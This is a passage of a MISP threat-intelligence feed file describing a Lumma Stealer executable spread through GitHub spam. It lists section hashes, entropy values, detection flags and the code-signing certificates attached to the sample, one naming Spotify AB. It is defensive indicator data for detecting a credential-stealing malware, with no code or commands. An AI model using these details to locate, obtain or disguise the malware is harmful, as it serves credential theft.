adulau/misp-circl-feed
1
0
Fork 0
Code Issues Pull requests Projects 1 Releases Packages Wiki Activity Actions
misp-circl-feed/feeds/circl/misp/eaa6f2f7-a944-47d2-a71d-cc7080c27fed.json

1865 lines
524 KiB
JSON
Raw Normal View History

chg: [feeds] updated
2024-12-27 11:52:46 +01:00
{
"Event": {
"analysis": "0",
"date": "2024-09-19",
"extends_uuid": "",
"info": "Lumma Stealer Malware (delivered via GitHub Spam) - Pandora analysis (l6E.exe)",
"publish_timestamp": "1726731078",
"published": true,
"threat_level_id": "4",
"timestamp": "1726731053",
"uuid": "eaa6f2f7-a944-47d2-a71d-cc7080c27fed",
"Orgc": {
"name": "CIRCL",
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
},
"Tag": [
{
"colour": "#0088cc",
"local": false,
"name": "misp-galaxy:malpedia=\"Lumma Stealer\"",
"relationship_type": ""
},
{
"colour": "#004646",
"local": false,
"name": "type:OSINT",
"relationship_type": ""
},
{
"colour": "#0071c3",
"local": false,
"name": "osint:lifetime=\"perpetual\"",
"relationship_type": ""
},
{
"colour": "#ffffff",
"local": false,
"name": "tlp:white",
"relationship_type": ""
},
{
"colour": "#ffffff",
"local": false,
"name": "tlp:clear",
"relationship_type": ""
}
],
"Attribute": [],
"Object": [
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1726726646",
"uuid": "955c7da3-97ac-4ea0-bc8d-50dee6e03306",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "b4909947-07c4-4896-aaa3-c723e4da85bd",
"value": ".text"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1726726646",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "edc458e8-d973-4fd8-92d8-6311c4d57f9f",
"value": "340992"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1726726646",
"to_ids": false,
"type": "float",
"uuid": "33c823cc-ac6f-4e09-b550-676bf9217b11",
"value": "7.9962764836933"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1726726646",
"to_ids": true,
"type": "md5",
"uuid": "0b956e68-c3b9-4c7f-8b41-86574b936f62",
"value": "14ca9e349f994e878e57686119f004d4"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha1",
"uuid": "732b6f90-810e-4330-8009-4f861ac91d7e",
"value": "9fca5f5394c9dfe0c1e13f05b4ef26c02d4f7862"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha256",
"uuid": "518870f6-9302-43ec-846d-9dd72d6bd21d",
"value": "ff87b44ae63fc48174dd73a0efb161df297861d1e4b9c66eb1869eb0b355d7db"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha512",
"uuid": "0073e7c4-ab21-43a4-b6e0-a6a35dac0dcb",
"value": "f9768fddc997d4f9eea1b982e4bc1b5c42edd9bcf7aa7031fba976f65d663211505b40a0a5d2b943998396fb4ee406b14867754edf74c18e922679bb809ab5a0"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1726726646",
"to_ids": true,
"type": "ssdeep",
"uuid": "3e6b9523-17a0-406b-813a-1aad3eabfacc",
"value": "6144:/Dd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QL:Z+O5yIqxwI3tFOqWeqcYbZYzL"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1726726646",
"uuid": "d8e8ebd4-0bdd-44f7-9802-14ebf7842bb1",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "77b42955-59c7-4099-92f9-860026e5d139",
"value": ".rsrc"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1726726646",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "8a1c3d0f-ff2b-4d0e-9dd1-7c5a3f87c552",
"value": "1536"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1726726646",
"to_ids": false,
"type": "float",
"uuid": "ea5d4cca-6725-43c1-853f-4b38e373b925",
"value": "4.224078572507"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1726726646",
"to_ids": true,
"type": "md5",
"uuid": "55a8331b-fb85-4d4d-a2ed-f309bfdfc276",
"value": "c38218fae44dcc2ce3d1629fec6039ed"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha1",
"uuid": "395f491e-7183-4c16-8bbe-699f42b8a533",
"value": "59ce2a22d5441931757c56512e053728c1113694"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha256",
"uuid": "fd38d729-9878-43ac-bbc1-d21c37cf224d",
"value": "30333eda5ecb5656ee2cbd56528cf9f16c55befa0e4a0d3d08d15b69a3097b97"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha512",
"uuid": "b7e2a1f8-ab37-4b5c-a8c3-b50889b60b08",
"value": "5503f5311d379b243ec5177996e9d8d0b0cd14e12383cf44f93f4be83a1b0109828683e80eee2dc7131948e1f6d1708165ffe91771d4354649c03c0d004bad17"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "ssdeep",
"timestamp": "1726726646",
"to_ids": false,
"type": "ssdeep",
"uuid": "be033b1f-c601-46b5-93ec-261dac6d59c0",
"value": "24:7DRIYKyV6CyZhNPs2E31MPN8qgdt4+lEbNFjMyi0r:H1JoplP76KFWSfbNtm+"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1726726646",
"uuid": "dd34d3e1-91f3-4dd5-95b8-b870b7a19f84",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "3e4fd42f-994d-475d-aca9-0d815e2c9c50",
"value": ".reloc"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1726726646",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "b81e0aaa-3423-4785-91fc-75fa8374928c",
"value": "512"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1726726646",
"to_ids": false,
"type": "float",
"uuid": "6d710c11-e24c-4242-8fc8-59c9dc1ead18",
"value": "1.9473387961876"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1726726646",
"to_ids": true,
"type": "md5",
"uuid": "e424a76c-3282-4f7c-b863-1f280ad74df7",
"value": "b1c19dc88419b41741030f2fceb517c1"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha1",
"uuid": "64b0d5d4-960e-4339-a1b7-7402e7e922a4",
"value": "ce204d1894753f6a806fda9121c0e3ea83c23dd5"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha256",
"uuid": "e0756a69-cdba-4dc9-8069-f0b041214104",
"value": "9a6833fd3cc183b906caf84dad1e9ce58b805f604b34fa49c73395c2a27c2a2a"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha512",
"uuid": "646cfa34-a007-4571-998c-8886fd6190b1",
"value": "84ddff913d039c49bc4de7b69f43552949d05090a44b31cbb65a6474edea9eebaedb10962f1fa38e36b22f1f890787e6192eb7752d6708d11de87a14c0d93bbf"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1726726646",
"to_ids": true,
"type": "ssdeep",
"uuid": "391c66d8-a317-4d3c-ad8c-d22e96639603",
"value": "3:oRlF1l:oD1"
}
]
},
{
"comment": "",
"deleted": false,
"description": "x509 object describing a X.509 certificate",
"meta-category": "network",
"name": "x509",
"template_uuid": "d1ab756a-26b5-4349-9f43-765630f0911c",
"template_version": "13",
"timestamp": "1726726646",
"uuid": "d98b9983-dd3f-46e0-886f-d239c9901b8f",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "issuer",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "ae53fa92-9263-4939-b367-7f529dcbb6cb",
"value": "C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Trusted Root G4"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "validity-not-before",
"timestamp": "1726726646",
"to_ids": false,
"type": "datetime",
"uuid": "d48f3cf7-768f-4304-b7e8-64ca57ad24e6",
"value": "2021-04-29T00:00:00+00:00"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "validity-not-after",
"timestamp": "1726726646",
"to_ids": false,
"type": "datetime",
"uuid": "ac882f08-18d4-4e9b-b5a4-14e428f84b07",
"value": "2036-04-28T23:59:59+00:00"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "version",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "736e0ebb-4f18-409e-ac08-d1c59710f23c",
"value": "3"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "subject",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "1e6e2e12-19c3-4c36-86c4-3695682e2206",
"value": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "signature_algorithm",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "94736fdb-a0cf-4035-89b8-13d608bd99bd",
"value": "1.2.840.113549.1.1.12"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "raw-base64",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "c99f120b-c888-4b19-8e88-4a925529f91f",
"value": "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"
}
]
},
{
"comment": "",
"deleted": false,
"description": "x509 object describing a X.509 certificate",
"meta-category": "network",
"name": "x509",
"template_uuid": "d1ab756a-26b5-4349-9f43-765630f0911c",
"template_version": "13",
"timestamp": "1726726646",
"uuid": "e64b7f30-9aed-4fff-823b-72c2a22b16f8",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "issuer",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "aee1735d-49c3-4651-b387-99a67cf0f149",
"value": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "validity-not-before",
"timestamp": "1726726646",
"to_ids": false,
"type": "datetime",
"uuid": "038485ce-bbf3-43e7-a40f-557e28f33193",
"value": "2022-09-22T00:00:00+00:00"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "validity-not-after",
"timestamp": "1726726646",
"to_ids": false,
"type": "datetime",
"uuid": "97da5746-61a2-4f54-bd35-6ce65a4422e6",
"value": "2023-10-19T23:59:59+00:00"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "version",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "05ca4f66-76e3-416e-acb7-446dd5c89d40",
"value": "3"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "subject",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "b3df0b25-7cbd-4958-914d-3b0196c62427",
"value": "??=SE, ??=Private Organization, serialNumber=5567037485, C=SE, L=Stockholm, O=Spotify AB, CN=Spotify AB"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "signature_algorithm",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "77cc33c2-d67f-41d3-b10f-9a2d688937ab",
"value": "1.2.840.113549.1.1.11"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "raw-base64",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "01afb2ad-e2e6-41b4-83b0-b7b4905d355d",
"value": "MIIHuTCCBaGgAwIBAgIQBMUwcDohDsHW+Dy0/hEYxTANBgkqhkiG9w0BAQsFADBpMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xQTA/BgNVBAMTOERpZ2lDZXJ0IFRydXN0ZWQgRzQgQ29kZSBTaWduaW5nIFJTQTQwOTYgU0hBMzg0IDIwMjEgQ0ExMB4XDTIyMDkyMjAwMDAwMFoXDTIzMTAxOTIzNTk1OVowgZQxEzARBgsrBgEEAYI3PAIBAxMCU0UxHTAbBgNVBA8MFFByaXZhdGUgT3JnYW5pemF0aW9uMRMwEQYDVQQFEwo1NTY3MDM3NDg1MQswCQYDVQQGEwJTRTESMBAGA1UEBxMJU3RvY2tob2xtMRMwEQYDVQQKEwpTcG90aWZ5IEFCMRMwEQYDVQQDEwpTcG90aWZ5IEFCMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxTXaEA/FKBCeOjeLJlOH5yxGPG5eIUNW2s7VziRFAx3hVA7wLdAEBYN7CD3cXGHVjYSZp5re8l8ZhMaNLjizmX4OgpKRR3KhxL5jrlCfdNDfFSQO0+hbBvLWdsl86LqY5OkJgTsaSdptzEnJIIcoAkLk3ZpfnoWzb5+obkZ+Jjqv/NsBgQLjpIP8RCg9+BdMK11SeT3odvX9PgcK6lwbChVZFm2s8M5tKBF797Q2cIr3vHobTkwuWBB8Oc9/mkSeRGtL1S0d3/mVWQM2A0/CJvVmXMSN3G2BL/pdpLKcwz1NwaOIH81ouT0Bzi3UrKROEWZcnMucV3msnc83edrI74hMQpx2IGkjJ/KARBDN2mCg9ruZ9Jdo+6rTymIOogbow7EkRAV5jyz9Q5n62LbQbnaF96/C4eElcFkN30Sxhs8B1j2tk4R4V9CKCu11JV6oriOoD59YOX0VUu8QlXsDjlC/+N31cdP6oJ1Tk5HwBG1Zul17kXviHTMe2uZW6uk5oOdSkbr1qo1dvpSuuGbBoxXp3H9w5TudUh40PALgolG5SccL4qf8QDumkAzspZ6O0XL/iyLQUJiCap7TyocQNCXbMkQKcm6htgXOKNhCaCFvh0q71ourGxAKoEMgFhPTgmITdc5ev/Dg6FesyBQpWkeh4pfI1jQgZKOqVLgPkJUCAwEAAaOCAi8wggIrMB8GA1UdIwQYMBaAFGg34Ou2O/hfEYb7/mF7CIhl9E5CMB0GA1UdDgQWBBR82HOaCkDMqLUuVQKcSsEWFYUwqjAoBgNVHREEITAfoB0GCCsGAQUFBwgDoBEwDwwNU0UtNTU2NzAzNzQ4NTAOBgNVHQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwgbUGA1UdHwSBrTCBqjBToFGgT4ZNaHR0cDovL2NybDMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0Q29kZVNpZ25pbmdSU0E0MDk2U0hBMzg0MjAyMUNBMS5jcmwwU6BRoE+GTWh0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydFRydXN0ZWRHNENvZGVTaWduaW5nUlNBNDA5NlNIQTM4NDIwMjFDQTEuY3JsMD0GA1UdIAQ2MDQwMgYFZ4EMAQMwKTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGUBggrBgEFBQcBAQSBhzCBhDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMFwGCCsGAQUFBzAChlBodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkRzRDb2RlU2lnbmluZ1JTQTQwOTZTSEEzODQyMDIxQ0ExLmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3DQEBCwUAA4ICAQBFlboRG5xEiuk64WXFhDHS/xv8Jsk8L28vdw5NfTjYf+v6UW9QkgEqqEqPKXJAszgbeHbENQE171+U4B0mk+88ybtzcr5s+AjdQxS2htD72TN/DjnGldhy2gOa2KdljMMYMiBw0DPUDSSGXlDtgKuYSprP7Aj81DmPDVXvmRVnHwNKAUtEmhXHGkC3mBt6hrM8OqSkCwV39LiYm3dDhCoCJGuxRNOURiDIDVbQUMOediHbKK+LdjUaMQBtYyLUcIg+79Tta7L87EtK9In9wbc/MhNzOmcwMsFFUfofNSPQQiriwYcB44tw8jwctmszKWakT7CYhG+0bCPCOSmdxABOSJrsj0R2AjinFJE/u7aRoirMRxqMyTETQYvGszoEvHiLWWaYCDNxLoADpwktU5hNlhe080bpMwprlgaDDUXwIYftqK2svL5zpYdxHzo81EBZHrlVW6DaG4pTgqxNetQqAMB6H/IMpXihv5OIHyktK8hJxot+jSSznYFdMcCi4Y+36MfiNtS1Hef4EGMFUc7B/mPFG+HMU3ZYbNSe+bI8axq/fZNlIRbxk8Qj8OvS1aEiNn3tgDNvhAWBVeQsmoPMf2fKTbiP2O7wqAHMMbsz/mvt7Jmtx+RjI5ZIf2NLxUUZvrnnaQXo6xqnjnG5clFpTgYbfK62rWI0tNk9keM4jg=="
}
]
},
{
"comment": "",
"deleted": false,
"description": "Authenticode Signer Info",
"meta-category": "file",
"name": "authenticode-signerinfo",
"template_uuid": "965cb0aa-baf1-4cc6-9070-68f5c1698c1e",
"template_version": "2",
"timestamp": "1726726646",
"uuid": "c30b4f6b-e94d-4995-9e2a-ab675a47a020",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "issuer",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "f90f1d07-fe98-4bbb-8436-730415190e8b",
"value": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "version",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "00da5189-e1ae-4642-901c-cf7320e7bde8",
"value": "1"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "digest_algorithm",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "38c06d22-7fb9-48cc-af3a-13745e979bb8",
"value": "lief._lief.PE.ALGORITHMS.SHA_256"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "encryption_algorithm",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "45c36dff-e7df-46da-aaa4-1ed160399d3c",
"value": "lief._lief.PE.ALGORITHMS.RSA"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "digest-base64",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "6f842da7-09df-499a-9454-865b71b343d5",
"value": "He0POadHf8XSEC0gfF8OrYthzmL5j0x3n+yt7ddmDbC5Tzxvu3L+mg0IoqZoMwRL+30Ji7BheT9V0dhkzYQHxkgDa8NjviUj1ZrRjf2B+de1VNuKWmOrqWEj5/Fn2dcwuAL2T0oYV5ncJAGqsm6i/m/fKCfULIN4jWgYBkIuqmNtoFcX24RgbAKeLKzvUVKCBOZK0UTEWe7wYg5HptSUzbHSAGKBodJ1kpjnlBx2YNB6IMepEJr/CHGRjAJG83zAskVQJB4Yx3pQBnSVXcA8Wxx5WOwRolQfxTrAw6iSKFakNLAJNb0OmL1WaruDQAFweR02c2JRIZHxYFp3YFwTooYBQJltCWKKJdtkTmI6GaLzI6qaAOXbDcQ3vULwA0ZE/VXIlHdfEMW79chazxYHMzpNKvZHrUrFSnDNgyWxp+M1yOunAG6XHpHV/jkUQpP5au/woxVY4lQ+xHf2kxHRC5DTakIWOi8Jq1M5rDnJas2qsOpkI4pFjOhRA/m/Hg/ODUyX7tvqcR+XL8W4MIScODCw01HNzuMI7BL2/zWFzyKSesw2cESxGEiTo/D0sVF2yqqc7C1ioPXPtAHq5Sl2nowfZLYChpmd7I8flt+SKbo95a0O27TcZvwlaMy0Jy5O1+KPajL5hRcJX801gLCf4fKHPTNfc6dX1RPjzWokplg="
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a Portable Executable",
"meta-category": "file",
"name": "pe",
"template_uuid": "cf7adecc-d4f0-4e88-9d90-f978ee151a07",
"template_version": "10",
"timestamp": "1726728010",
"uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"ObjectReference": [
{
"comment": "Section 0 of PE",
"object_uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"referenced_uuid": "955c7da3-97ac-4ea0-bc8d-50dee6e03306",
"relationship_type": "includes",
"timestamp": "1726726646",
"uuid": "2138bcc1-1cde-465a-8117-e507097ce3ea"
},
{
"comment": "Section 1 of PE",
"object_uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"referenced_uuid": "d8e8ebd4-0bdd-44f7-9802-14ebf7842bb1",
"relationship_type": "includes",
"timestamp": "1726726646",
"uuid": "4169abc0-42ce-4d27-bd01-594e43e0294e"
},
{
"comment": "Section 2 of PE",
"object_uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"referenced_uuid": "dd34d3e1-91f3-4dd5-95b8-b870b7a19f84",
"relationship_type": "includes",
"timestamp": "1726726646",
"uuid": "3ca8ffad-08f7-4d74-8c8a-5fce3eff98b4"
},
{
"comment": "",
"object_uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"referenced_uuid": "d98b9983-dd3f-46e0-886f-d239c9901b8f",
"relationship_type": "signed-by",
"timestamp": "1726726646",
"uuid": "e596620b-09b0-4bd9-a7f2-23d0793a3a89"
},
{
"comment": "",
"object_uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"referenced_uuid": "e64b7f30-9aed-4fff-823b-72c2a22b16f8",
"relationship_type": "signed-by",
"timestamp": "1726726646",
"uuid": "84fbc4f6-bdea-4c61-88e4-3828f47110a8"
},
{
"comment": "",
"object_uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"referenced_uuid": "c30b4f6b-e94d-4995-9e2a-ab675a47a020",
"relationship_type": "signed-by",
"timestamp": "1726726646",
"uuid": "fb18ff4c-b79b-4d72-ab06-2ffe508b857f"
},
{
"comment": "",
"object_uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"referenced_uuid": "8ad8f83d-4f64-4a66-8849-e6b3fe938725",
"relationship_type": "connects-to",
"timestamp": "1726728010",
"uuid": "30fd039d-2588-4c2f-a51e-aaea75a1cae0"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "type",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "eb9b1822-66fc-47b4-a6c1-1b468759e9c5",
"value": "exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entrypoint-address",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "82e11215-6a9b-42ce-a714-ba4ec300a235",
"value": "4543198"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "compilation-timestamp",
"timestamp": "1726726646",
"to_ids": false,
"type": "datetime",
"uuid": "debae278-a8ac-4ab5-9fd7-9e937a53ba62",
